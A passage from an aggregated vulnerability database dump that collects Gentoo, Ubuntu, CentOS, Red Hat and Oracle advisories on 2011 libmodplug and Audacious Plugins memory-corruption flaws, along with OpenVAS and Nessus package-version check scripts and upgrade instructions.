http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities in Audacious Plugins could result in\n execution of arbitrary code or Denial of Service.\");\n script_tag(name:\"solution\", value:\"All Audacious Plugins users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-plugins/audacious-plugins-3.1'\");\n\n script_xref(name:\"URL\", value:\"http://www.securityspace.com/smysecure/catid.html?in=GLSA%20201203-14\");\n script_xref(name:\"URL\", value:\"http://bugs.gentoo.org/show_bug.cgi?id=383991\");\n script_tag(name:\"summary\", value:\"The remote host is missing updates announced in\nadvisory GLSA 201203-14.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-gentoo.inc\");\ninclude(\"revisions-lib.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = ispkgvuln(pkg:\"media-plugins/audacious-plugins\", unaffected: make_list(\"ge 3.1\"), vulnerable: make_list(\"lt 3.1\"))) != NULL ) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:01", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-1574", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "### Background\n\nModPlug is a library for playing MOD-like music.\n\n### Description\n\nMultiple vulnerabilities have been found in ModPlug:\n\n * The ReadS3M method in load_s3m.cpp fails to validate user-supplied information, which could cause a stack-based buffer overflow (CVE-2011-1574). 
\n * The \"CSoundFile::ReadWav()\" function in load_wav.cpp contains an integer overflow which could cause a heap-based buffer overflow (CVE-2011-2911). \n * The \"CSoundFile::ReadS3M()\" function in load_s3m.cpp contains multiple boundary errors which could cause a stack-based buffer overflow (CVE-2011-2912). \n * The \"CSoundFile::ReadAMS()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2913). \n * The \"CSoundFile::ReadDSM()\" function in load_dms.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2914). \n * The \"CSoundFile::ReadAMS2()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2915). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file, possibly resulting in execution of arbitrary code, or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ModPlug users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/libmodplug-0.8.8.4\"\n \n\nNOTE: This is a legacy GLSA. Updates for all affected architectures are available since August 27, 2011. 
It is likely that your system is already no longer affected by this issue.", "edition": 1, "modified": "2012-03-16T00:00:00", "published": "2012-03-16T00:00:00", "id": "GLSA-201203-16", "href": "https://security.gentoo.org/glsa/201203-16", "type": "gentoo", "title": "ModPlug: User-assisted execution of arbitrary code", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-06T19:46:18", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "### Background\n\nPlugins for the Audacious music player.\n\n### Description\n\nMultiple vulnerabilities have been found in Audacious Plugins:\n\n * The \"CSoundFile::ReadWav()\" function in load_wav.cpp contains an integer overflow which could cause a heap-based buffer overflow (CVE-2011-2911). \n * The \"CSoundFile::ReadS3M()\" function in load_s3m.cpp contains multiple boundary errors which could cause a stack-based buffer overflow (CVE-2011-2912). \n * The \"CSoundFile::ReadAMS()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2913). \n * The \"CSoundFile::ReadDSM()\" function in load_dms.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2914). \n * The \"CSoundFile::ReadAMS2()\" function in load_ams.cpp contains an off-by-one error which could cause memory corruption (CVE-2011-2915). \n\n### Impact\n\nA remote attacker could entice a user to open a specially crafted media file, possibly resulting in execution of arbitrary code, or a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Audacious Plugins users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=media-plugins/audacious-plugins-3.1\"", "edition": 1, "modified": "2012-03-16T00:00:00", "published": "2012-03-16T00:00:00", "id": "GLSA-201203-14", "href": "https://security.gentoo.org/glsa/201203-14", "type": "gentoo", "title": "Audacious Plugins: User-assisted execution of arbitrary code", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "ubuntu": [{"lastseen": "2020-07-08T23:34:03", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Hossein Lotfi discovered that libmodplug did not correctly handle certain \nmalformed media files. If a user or automated system were tricked into \nopening a crafted media file, an attacker could cause a denial of service \nor possibly execute arbitrary code with privileges of the user invoking the \nprogram. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain \nmalformed media files. If a user or automated system were tricked into \nopening a crafted media file, an attacker could cause a denial of service \nor possibly execute arbitrary code with privileges of the user invoking the \nprogram. 
(CVE-2011-2914, CVE-2011-2915)", "edition": 5, "modified": "2011-11-09T00:00:00", "published": "2011-11-09T00:00:00", "id": "USN-1255-1", "href": "https://ubuntu.com/security/notices/USN-1255-1", "title": "libmodplug vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T00:31:22", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2011-1761"], "description": "It was discovered that libmodplug did not correctly handle certain \nmalformed S3M media files. If a user or automated system were tricked into \nopening a crafted S3M file, an attacker could cause a denial of service or \npossibly execute arbitrary code with privileges of the user invoking the \nprogram. (CVE-2011-1574)\n\nIt was discovered that libmodplug did not correctly handle certain \nmalformed ABC media files. If a user or automated system were tricked into \nopening a crafted ABC file, an attacker could cause a denial of service or \npossibly execute arbitrary code with privileges of the user invoking the \nprogram. 
(CVE-2011-1761)\n\nThe default compiler options for affected releases should reduce the \nvulnerability to a denial of service.", "edition": 5, "modified": "2011-06-13T00:00:00", "published": "2011-06-13T00:00:00", "id": "USN-1148-1", "href": "https://ubuntu.com/security/notices/USN-1148-1", "title": "libmodplug vulnerabilities", "type": "ubuntu", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:28:39", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1264\n\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws\nwere found in various ModPlug music file format library (libmodplug)\nmodules, embedded in GStreamer. An attacker could create specially-crafted\nmusic files that, when played by a victim, would cause applications using\nGStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\nCVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. 
After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-September/029757.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-September/029758.html\n\n**Affected packages:**\ngstreamer-plugins\ngstreamer-plugins-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1264.html", "edition": 4, "modified": "2011-09-08T17:33:42", "published": "2011-09-08T17:33:02", "href": "http://lists.centos.org/pipermail/centos-announce/2011-September/029757.html", "id": "CESA-2011:1264", "title": "gstreamer security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:03", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2006-4192"], "description": "**CentOS Errata and Security Advisory** CESA-2011:0477\n\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, and a\nstack-based buffer overflow flaw were found in various ModPlug music file\nformat library (libmodplug) modules, embedded in GStreamer. An attacker\ncould create specially-crafted music files that, when played by a victim,\nwould cause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2006-4192, CVE-2011-1574)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. 
After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-May/029510.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-May/029511.html\n\n**Affected packages:**\ngstreamer-plugins\ngstreamer-plugins-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-0477.html", "edition": 4, "modified": "2011-05-04T12:22:21", "published": "2011-05-04T12:22:21", "href": "http://lists.centos.org/pipermail/centos-announce/2011-May/029510.html", "id": "CESA-2011:0477", "title": "gstreamer security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:44:45", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2911", "CVE-2011-2912", "CVE-2011-2913", "CVE-2011-2914", "CVE-2011-2915"], "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws\nwere found in various ModPlug music file format library (libmodplug)\nmodules, embedded in GStreamer. An attacker could create specially-crafted\nmusic files that, when played by a victim, would cause applications using\nGStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911,\nCVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. 
After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n", "modified": "2017-09-08T12:18:44", "published": "2011-09-06T04:00:00", "id": "RHSA-2011:1264", "href": "https://access.redhat.com/errata/RHSA-2011:1264", "type": "redhat", "title": "(RHSA-2011:1264) Important: gstreamer-plugins security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:04", "bulletinFamily": "unix", "cvelist": ["CVE-2006-4192", "CVE-2011-1574"], "description": "The gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, and a\nstack-based buffer overflow flaw were found in various ModPlug music file\nformat library (libmodplug) modules, embedded in GStreamer. An attacker\ncould create specially-crafted music files that, when played by a victim,\nwould cause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2006-4192, CVE-2011-1574)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues. 
After\ninstalling the update, all applications using GStreamer (such as Rhythmbox)\nmust be restarted for the changes to take effect.\n", "modified": "2017-09-08T11:55:05", "published": "2011-05-02T04:00:00", "id": "RHSA-2011:0477", "href": "https://access.redhat.com/errata/RHSA-2011:0477", "type": "redhat", "title": "(RHSA-2011:0477) Important: gstreamer-plugins security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:44", "bulletinFamily": "unix", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "[0.8.5-1.0.1.EL.4]\n- Update release to address ULN up2date\n[0.8.5-1.EL.4]\n- Add patches for CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914\n and CVE-2011-2915\nRelated: rhbz #730997", "edition": 4, "modified": "2011-09-07T00:00:00", "published": "2011-09-07T00:00:00", "id": "ELSA-2011-1264", "href": "http://linux.oracle.com/errata/ELSA-2011-1264.html", "title": "gstreamer-plugins security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:16", "bulletinFamily": "unix", "cvelist": ["CVE-2011-1574", "CVE-2006-4192"], "description": "[0.8.5-1.0.1.EL.3]\n- Update release to address ULN up2date\n[0.8.5-1.EL.3]\n- Add patches for CVE-2006-4192 and CVE-2011-1574\nRelated: rhbz #696507", "edition": 4, "modified": "2011-05-02T00:00:00", "published": "2011-05-02T00:00:00", "id": "ELSA-2011-0477", "href": "http://linux.oracle.com/errata/ELSA-2011-0477.html", "title": "gstreamer-plugins security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:42", "bulletinFamily": "software", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": 
"==========================================================================\r\nUbuntu Security Notice USN-1255-1\r\nNovember 09, 2011\r\n\r\nlibmodplug vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 11.10\r\n- Ubuntu 11.04\r\n- Ubuntu 10.10\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nlibmodplug could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- libmodplug: Library for mod music based on ModPlug\r\n\r\nDetails:\r\n\r\nHossein Lotfi discovered that libmodplug did not correctly handle certain\r\nmalformed media files. If a user or automated system were tricked into\r\nopening a crafted media file, an attacker could cause a denial of service\r\nor possibly execute arbitrary code with privileges of the user invoking the\r\nprogram. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913)\r\n\r\nIt was discovered that libmodplug did not correctly handle certain\r\nmalformed media files. If a user or automated system were tricked into\r\nopening a crafted media file, an attacker could cause a denial of service\r\nor possibly execute arbitrary code with privileges of the user invoking the\r\nprogram. 
(CVE-2011-2914, CVE-2011-2915)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 11.10:\r\n libmodplug1 1:0.8.8.2-3ubuntu1.1\r\n\r\nUbuntu 11.04:\r\n libmodplug1 1:0.8.8.1-2ubuntu0.3\r\n\r\nUbuntu 10.10:\r\n libmodplug1 1:0.8.8.1-1ubuntu1.3\r\n\r\nUbuntu 10.04 LTS:\r\n libmodplug0c2 1:0.8.7-1ubuntu0.3\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1255-1\r\n CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914,\r\n CVE-2011-2915\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.2-3ubuntu1.1\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.1-2ubuntu0.3\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.8.1-1ubuntu1.3\r\n https://launchpad.net/ubuntu/+source/libmodplug/1:0.8.7-1ubuntu0.3\r\n", "edition": 1, "modified": "2011-11-11T00:00:00", "published": "2011-11-11T00:00:00", "id": "SECURITYVULNS:DOC:27284", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:27284", "title": "[USN-1255-1] libmodplug vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:44", "bulletinFamily": "software", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "description": "Memory corruptions on different media formats.", "edition": 1, "modified": "2011-11-11T00:00:00", "published": "2011-11-11T00:00:00", "id": "SECURITYVULNS:VULN:12028", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12028", "title": "libmodplug library multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:41", "bulletinFamily": "software", "cvelist": 
["CVE-2011-1574", "CVE-2011-1761"], "description": "ReadS3M buffer overflow. DoS on ABC files parsing.", "edition": 1, "modified": "2011-04-11T00:00:00", "published": "2011-04-11T00:00:00", "id": "SECURITYVULNS:VULN:11574", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11574", "title": "libmodplug library buffer overflow", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2021-01-01T06:36:58", "description": "Hossein Lotfi discovered that libmodplug did not correctly handle\ncertain malformed media files. If a user or automated system were\ntricked into opening a crafted media file, an attacker could cause a\ndenial of service or possibly execute arbitrary code with privileges\nof the user invoking the program. (CVE-2011-2911, CVE-2011-2912,\nCVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain\nmalformed media files. If a user or automated system were tricked into\nopening a crafted media file, an attacker could cause a denial of\nservice or possibly execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2011-2914, CVE-2011-2915).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2011-11-10T00:00:00", "title": "Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : libmodplug vulnerabilities (USN-1255-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:11.10", "cpe:/o:canonical:ubuntu_linux:11.04", "cpe:/o:canonical:ubuntu_linux:10.04:-:lts", "p-cpe:/a:canonical:ubuntu_linux:libmodplug0c2", "p-cpe:/a:canonical:ubuntu_linux:libmodplug1", "cpe:/o:canonical:ubuntu_linux:10.10"], "id": "UBUNTU_USN-1255-1.NASL", "href": "https://www.tenable.com/plugins/nessus/56767", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1255-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56767);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/09/19 12:54:27\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"USN\", value:\"1255-1\");\n\n script_name(english:\"Ubuntu 10.04 LTS / 10.10 / 11.04 / 11.10 : libmodplug vulnerabilities (USN-1255-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hossein Lotfi discovered that libmodplug did not correctly handle\ncertain malformed media files. 
If a user or automated system were\ntricked into opening a crafted media file, an attacker could cause a\ndenial of service or possibly execute arbitrary code with privileges\nof the user invoking the program. (CVE-2011-2911, CVE-2011-2912,\nCVE-2011-2913)\n\nIt was discovered that libmodplug did not correctly handle certain\nmalformed media files. If a user or automated system were tricked into\nopening a crafted media file, an attacker could cause a denial of\nservice or possibly execute arbitrary code with privileges of the user\ninvoking the program. (CVE-2011-2914, CVE-2011-2915).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1255-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug0c2 and / or libmodplug1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmodplug0c2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libmodplug1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:10.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:11.04\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:canonical:ubuntu_linux:11.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2011-2019 Canonical, Inc. / NASL script (C) 2011-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|10\\.10|11\\.04|11\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 10.10 / 11.04 / 11.10\", \"Ubuntu \" + release);\nif ( ! 
get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"libmodplug0c2\", pkgver:\"1:0.8.7-1ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"10.10\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.1-1ubuntu1.3\")) flag++;\nif (ubuntu_check(osver:\"11.04\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.1-2ubuntu0.3\")) flag++;\nif (ubuntu_check(osver:\"11.10\", pkgname:\"libmodplug1\", pkgver:\"1:0.8.8.2-3ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug0c2 / libmodplug1\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:53:31", "description": "The remote host is affected by the vulnerability described in GLSA-201203-14\n(Audacious Plugins: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in Audacious Plugins:\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one 
error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 22, "published": "2012-03-19T00:00:00", "title": "GLSA-201203-14 : Audacious Plugins: User-assisted execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2012-03-19T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:audacious-plugins"], "id": "GENTOO_GLSA-201203-14.NASL", "href": "https://www.tenable.com/plugins/nessus/58379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201203-14.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58379);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"GLSA\", value:\"201203-14\");\n\n script_name(english:\"GLSA-201203-14 : Audacious Plugins: User-assisted execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-14\n(Audacious Plugins: User-assisted execution of arbitrary code)\n\n Multiple vulnerabilities have been found in Audacious Plugins:\n The 'CSoundFile::ReadWav()' function in load_wav.cpp contains an\n integer overflow which could cause a heap-based buffer overflow\n (CVE-2011-2911).\n The 'CSoundFile::ReadS3M()' function in load_s3m.cpp contains\n multiple boundary errors which could cause a stack-based buffer\n overflow (CVE-2011-2912).\n The 'CSoundFile::ReadAMS()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2913).\n The 'CSoundFile::ReadDSM()' function in load_dms.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2914).\n The 'CSoundFile::ReadAMS2()' function in load_ams.cpp contains an\n off-by-one error which could cause memory corruption (CVE-2011-2915).\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted media\n file, possibly resulting in execution of arbitrary code, or a Denial of\n Service condition.\n \nWorkaround 
